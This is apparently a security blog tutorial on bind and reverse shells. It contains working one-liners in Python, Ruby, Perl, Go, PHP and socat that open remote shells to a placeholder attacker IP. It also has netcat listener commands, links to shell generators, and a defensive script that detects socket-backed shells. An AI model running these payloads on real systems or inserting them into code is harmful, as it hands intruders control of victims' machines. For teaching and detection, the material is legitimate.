Popping Shells: When servers become puppets!
Introduction
In a remote attack scenario, an attacker takes control of the victim's machine using a reverse or bind shell. This cybersecurity blog post explores reverse and bind shells in depth, with illustrative examples. We clarify what constitutes a reverse shell and a bind shell and highlight their differences. Additionally, we examine how attackers employ these shells during an attack and how to generate them using available tools.
Bind Shells
An attacker triggers a bind shell on a target machine to launch a command shell that listens on a local port. The attacker then connects to the target machine on the listening port and executes commands to take control of the machine.
Attack Scenario
The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, a port will be opened on the target machine, and then an attacker will connect to the open port and take control of the target machine.
Issues with Bind Shell
Anyone who can reach the open port can connect to the bind shell, so an unrelated external attacker can take advantage of it and take control of the target machine.
Firewalls usually apply strict inbound filtering rules, which prevent the attacker from connecting to the newly opened port on the target machine.
If the target sits behind NAT/PAT, its private (RFC 1918) address is translated to a shared public address, so the attacker cannot reach the listening port directly.
Bind Shell using Netcat
Netcat is a command-line interface (CLI) tool used to read/write data over TCP and UDP.
Download Netcat from here.
On Target's Machine
On Attacker's Machine
nc -nv 192.168.226.131 3333
Python Bind Shell
Use the code below to launch a Python bind shell on the target machine. Both one-liners bind a listening socket, accept one connection, duplicate the connected socket onto file descriptors 0, 1 and 2, and then start an interactive /bin/sh on them.
# IPv4
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("<ip>",<port>));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
# IPv6
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.bind(("<ip>",<port>,0,2));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Reverse Shells
A reverse shell actively pushes a connection back to the attacker rather than waiting for the incoming connection. In this case, an attacker will open a local port and listen for a connection from the target machine.
Attack Scenario
The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, the target will connect to the attacker on mentioned IP address & port. Then, the attacker will take control of the target machine.
Advantages of Reverse Shell
Reverse shells remove the need for a listener on the target machine; thus, the target machine is not exposed to other external attackers.
Reverse shells can use popular ports (e.g. 80, 443) that are usually allowed for egress connections from an internal to an external network, bypassing firewall restrictions.
The attacker doesn't need to know the target's IP address, so NAT/PAT translation on the target side is not an obstacle.
Reverse Shell using Netcat
Netcat can be used to create a listener for incoming reverse shells.
On Target Machine
On Attacker Machine
nc -lnvp 7878
Python Reverse Shell
Use the code below to launch a Python reverse shell on the target machine. The first variant spawns the shell inside a pseudo-terminal; the other two duplicate the socket onto file descriptors 0, 1 and 2 and call /bin/sh directly.
export RHOST="<IP>";export RPORT=<PORT>;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python3 -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("<IP>",<PORT>));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
Ruby Reverse Shell
Use the code below to launch a Ruby reverse shell on the target machine. The first variant reads commands from the socket and runs each one; the second hands the socket's file descriptor to an interactive /bin/sh.
ruby -rsocket -e'exit if fork;c=TCPSocket.new("<IP>","<PORT>");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
ruby -rsocket -e'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Perl Reverse Shell
Use the code below to launch a Perl reverse shell on the target machine. The first variant reopens STDIN, STDOUT and STDERR on the socket before exec'ing /bin/sh; the second forks into the background and runs each received line with system.
perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Go Reverse Shell
Use the code below to launch a Go reverse shell on the target machine. Note that exec.Command wires the shell to the connection through pipes rather than attaching the socket to the shell directly.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<IP>:<PORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
PHP Reverse Shell
Use the code below to launch a PHP reverse shell on the target machine. In each variant the connection opened by fsockopen becomes file descriptor 3, and the shell's standard streams are redirected onto it.
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
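All the Python, Ruby, Perl and PHP one-liners above share one mechanism: the shell's file descriptors 0, 1 and 2 end up pointing at the network socket. That is also what a defender can look for on the host. The following is an added example written for this post, not code from the original, that flags processes whose stdin, stdout and stderr all resolve to sockets and whose program is a shell or scripting interpreter; it runs over a constructed in-memory snapshot shaped like the readlink results of /proc/<pid>/exe and /proc/<pid>/fd/N, and snapshot_proc (an assumed helper, Linux only) builds the same structure from a live /proc.

```python
import os
import re
from typing import Dict, List

# Programs that the payloads above leave holding a socket on fds 0-2:
# the spawned shell, or the interpreter itself in the pty.spawn variant
# (constructed watch-list; extend it to match your fleet).
SUSPECT_NAMES = {"sh", "bash", "dash", "zsh", "ash",
                 "python", "python3", "perl", "ruby", "php"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def is_socket_link(target: str) -> bool:
    """True if a /proc/<pid>/fd/N readlink target denotes a socket."""
    return bool(SOCKET_RE.match(target))


def find_socket_backed_shells(procs: Dict[int, dict]) -> List[dict]:
    """Return one finding per process whose fds 0, 1 and 2 all resolve to
    sockets and whose executable is on the watch-list. `procs` maps pid to
    {"exe": "/path", "cmdline": "...", "fds": {fd_number: readlink_target}}."""
    findings = []
    for pid, info in procs.items():
        fds = info.get("fds", {})
        stdio = [fds.get(n, "") for n in (0, 1, 2)]
        if not all(is_socket_link(t) for t in stdio):
            continue  # a normal shell has a tty, pipe or /dev/null here
        if os.path.basename(info.get("exe", "")) not in SUSPECT_NAMES:
            continue
        findings.append({"pid": pid, "exe": info["exe"],
                         "cmdline": info.get("cmdline", ""), "sockets": stdio})
    return findings


def snapshot_proc(proc_root: str = "/proc") -> Dict[int, dict]:
    """Build the same structure from a live Linux /proc (assumed helper;
    needs permission to read other users' fd tables, i.e. usually root)."""
    procs = {}
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        base = os.path.join(proc_root, name)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            fd_dir = os.path.join(base, "fd")
            fds = {int(n): os.readlink(os.path.join(fd_dir, n)) for n in os.listdir(fd_dir)}
        except OSError:
            continue  # process exited, or its fd table is not readable
        procs[int(name)] = {"exe": exe, "cmdline": cmdline, "fds": fds}
    return procs


# Constructed snapshot: pid 4242 is a shell whose stdio was dup2'd onto one socket.
SAMPLE_PROCS = {
    1234: {"exe": "/usr/bin/bash", "cmdline": "bash",
           "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    2345: {"exe": "/usr/sbin/sshd", "cmdline": "sshd: user [priv]",
           "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[33001]"}},
    4242: {"exe": "/usr/bin/dash", "cmdline": "/bin/sh -i",
           "fds": {0: "socket:[48811]", 1: "socket:[48811]", 2: "socket:[48811]"}},
}
```

The Go variant is the exception: exec.Command hands the shell pipes rather than the socket itself, so this host-side check sees pipes on fds 0-2 there and a network-side check (a shell process with an established outbound connection) is needed instead.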
Reverse Shell using Socat
Socat can be used to create a listener for incoming reverse shells.
On Target Machine
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
On Attacker Machine
socat -d -d TCP4-LISTEN:4444 STDOUT
Tools to Generate Reverse Shells
Reverse-Shell-Generator: https://www.revshells.com
Revshellgen: CLI Reverse Shell generator https://github.com/t0thkr1s/revshellgen
Shellerator: https://github.com/ShutdownRepo/shellerator
Shellpop: https://github.com/0x00-0x00/ShellPop
Pyminifier: https://liftoff.github.io/pyminifier